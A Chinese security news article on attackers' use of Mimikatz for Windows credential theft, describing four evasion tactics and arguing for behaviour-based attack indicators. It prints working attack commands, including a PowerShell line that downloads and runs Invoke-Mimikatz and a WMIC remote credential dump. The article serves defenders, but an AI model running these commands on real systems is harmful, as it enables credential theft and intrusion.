簡單粗暴:網(wǎng)絡攻擊界的AK47
日期:2019-05-23 11:00:32
投稿人:
Mimikatz是一款廣受犯罪團伙與流氓國家歡迎的開源提權工具包���。很多安全業(yè)內人士都聽說過這款工具的大名���,但對沒有聽說過的人而言�,那就是一個巨大的威脅�����。這款工具堪稱網(wǎng)絡攻擊武器庫中的AK47,即便沒到攻擊者人手一把的程度�,也幾乎可以當成是網(wǎng)絡攻擊團伙標配了���。對此一無所知的人可能面臨或已經(jīng)遭遇了它的侵害���。
無論對手是誰,幾乎所有Windows入侵當中都能見到它的身影�。這不僅僅是一種流行的憑證獲取方法�,也是針對性攻擊者和滲透測試人員都常用的憑證獲取工具,因為其繞過基于特征碼檢測的功能和有效性都十分強大���。
攻擊者常會尋找有效憑證以提升權限并擴展其在目標環(huán)境中的染指范圍��,獲得有效憑證的方法也是八仙過海各顯神通�����,有些攻擊者甚至針對同一個目標都會采用多種憑證盜竊技術�。
Mimikatz采用4種主要戰(zhàn)術:
修改可執(zhí)行文件名稱
運用批處理文件
采用PowerShell變種
改變命令行選項
我們不妨仔細分析一下�����。
1. 隱蔽:修改可執(zhí)行文件名稱
攻擊者使用該工具最簡單直接的方法就是將其拷貝到被入侵的系統(tǒng)中�����,修改可執(zhí)行文件的文件名�����,用以下命令行啟動之:
c:\ProgramData\p.exe “”privilege::debug””
“”sekurlsa::logonpasswords””
如此這般���,系統(tǒng)的憑證信息便落入了攻擊者手中���。
2. 有效:使用批處理文件
運用該工具的其他方式還包括采用批處理文件將工具拷貝到目標系統(tǒng)執(zhí)行���,然后將結果輸出到一個文件���,并將該輸出文件拷回中心收集點,最后再在目標系統(tǒng)上刪除所有相關文件���。
3. 召喚力量支援:采用PowerShell變種
采用Mimikatz的PowerShell變種是又一種獲取目標系統(tǒng)憑證信息的方法�����,比如:
powershell -ep Bypass -NoP -NonI -NoLogo -c IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent[.]com/[REDACTED]/Invoke-Mimikatz.ps1’);Invoke-Mimikatz -Command ‘privilege::debug sekurlsa::logonpasswordsexit’
4. 改變命令行選項
2018年第四季度見證了Mimikatz工具的另類用法,尤其是修改命令行選項的一種:
mnl.exe pr::dg sl::lp et -p
該特殊的Mimikatz變種通過WMIC.exe對多個目標系統(tǒng)下手,比如:
Wmic /NODE:”[REDACTED]” /USER:”[REDACTED]” /password:[REDACTED] process call create “cmd.exe /c (c:\windows\security\mnl.exe pr::dg sl::lp et -p >c:\windows\security\PList.txt) >> c:\windows\temp\temp.txt”
花招迭出:需要全面的應對方法
這一系列有效戰(zhàn)術充分顯示出監(jiān)測攻擊指標(IOA)的重要性���。每種技術都是逃避脆弱檢測方法的嘗試���,這些脆弱檢測方法要么只檢測命令行選項以推斷其目的��,要么只檢查二進制文件中有沒有出現(xiàn)相關字符串。
攻擊者可以運用多種技術獲取憑證信息���,但公司企業(yè)需要一定程度的可見性以便防御者能夠觀察到攻擊者所用的新技術,包括被特別用于繞過和顛覆檢測機制的那些���。
攻擊指標(IOA)專注于攻擊技術的行為特征�����,而不是像文件名�、散列值或單個命令行選項這樣的傳統(tǒng)入侵指標(IOC)�。新一代IOA過程能賦予防御者看清新攻擊技術的能力��,即便攻擊者使用了專門的規(guī)避或顛覆檢測機制的方法�����。這是因為IOA著眼攻擊者的意圖���,而萬變不離其宗,無論攻擊者使用哪種惡意軟件或漏洞利用程序,終歸逃不脫其惡意目的�,只要盯緊攻擊意圖���,攻擊便無所遁形。
網(wǎng)絡取證領域中,IOC往往被描述為計算機上留存的指征網(wǎng)絡安全被破壞的證據(jù)���。在接到可疑事件通報,或是定期檢查���,亦或發(fā)現(xiàn)網(wǎng)絡中非正常呼出后���,調查人員往往會去收集這些數(shù)據(jù)。理想狀況下���,這些信息被收集以后能夠創(chuàng)建更智能的工具,可以檢測并隔離未來的可疑文件���。因為IOC提供的是跟蹤壞人的反應式方法,當你發(fā)現(xiàn)IOC時��,有極大的可能性已經(jīng)被黑了。
此類IOC指征一系列惡意活動�����,從簡單的I/O操作到提權都有���。注重行為特征的IOA關聯(lián)則將這些指標都綜合到一起,用以檢測并防止惡意行為�����。其結果就是連通過反射注入PowerShell模塊進行的憑證盜竊都能檢測出來的防御技術�����,可以在攻擊者實際觀測到憑證前扼住該憑證盜取行為�。
與基于特征碼的殺毒軟件類似���,基于IOC的檢測方法無法檢測無惡意軟件的威脅和零日漏洞攻擊���。因此,公司企業(yè)紛紛轉向基于IOA的方法以便更好地適應其安全需求�����。
文章來源:安全牛
